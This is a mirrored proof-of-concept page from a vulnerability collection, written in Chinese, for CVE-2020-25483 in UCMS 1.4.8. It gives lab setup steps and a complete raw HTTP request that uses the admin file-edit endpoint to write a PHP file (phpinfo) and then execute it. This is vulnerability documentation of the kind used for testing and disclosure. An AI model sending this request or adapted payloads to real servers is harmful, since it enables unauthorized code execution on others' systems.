admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 19:38:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/CMS漏洞/UCMS 文件上传漏洞 CVE-2020-25483.md

62 lines
1.7 KiB
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# UCMS 文件上传漏洞 CVE-2020-25483
## 漏洞描述
UCMS v1.4.8版本存在安全漏洞该漏洞源于文件写的fopen()函数存在任意命令执行漏洞,攻击者可利用该漏洞可以通过该漏洞访问服务器。
## 环境搭建
到官网http://uuu.la/下载源码http://uuu.la/uploadfile/file/ucms_1.4.8.zip解压到web目录访问[http:///install/index.php](http://127.0.0.1/opensis/install/index.php)进行安装。
访问/ucms/login.php显示正常及环境安装成功。
![20221206164828](images/20221206164828.png)
## 漏洞复现
登录账户
![](images/20221206164829.png)
poc
访问/ucms/index.php?do=sadmin_fileedit&dir=/&file=1.php抓包。
写入php代码发送。
```
POST /ucms/index.php?do=sadmin_fileedit&dir=/&file=1.php HTTP/1.1
Host: ucms.com
Content-Length: 58
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ucms.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 Edg/87.0.664.41
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ucms.com/ucms/index.php?do=sadmin_fileedit&dir=/&file=CNVD.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: admin_213f42=admin; psw_213f42=0ef8fa2c997f64b78cde98b6c7c9cc0a; token_213f42=78012aac
Connection: close
uuu_token=78012aac&co=%3C%3Fphp+phpinfo%28%29%3F%3E&pos=17
```
get /1.php
![20221206165017](images/20221206165017.png)
Reference in New Issue Copy Permalink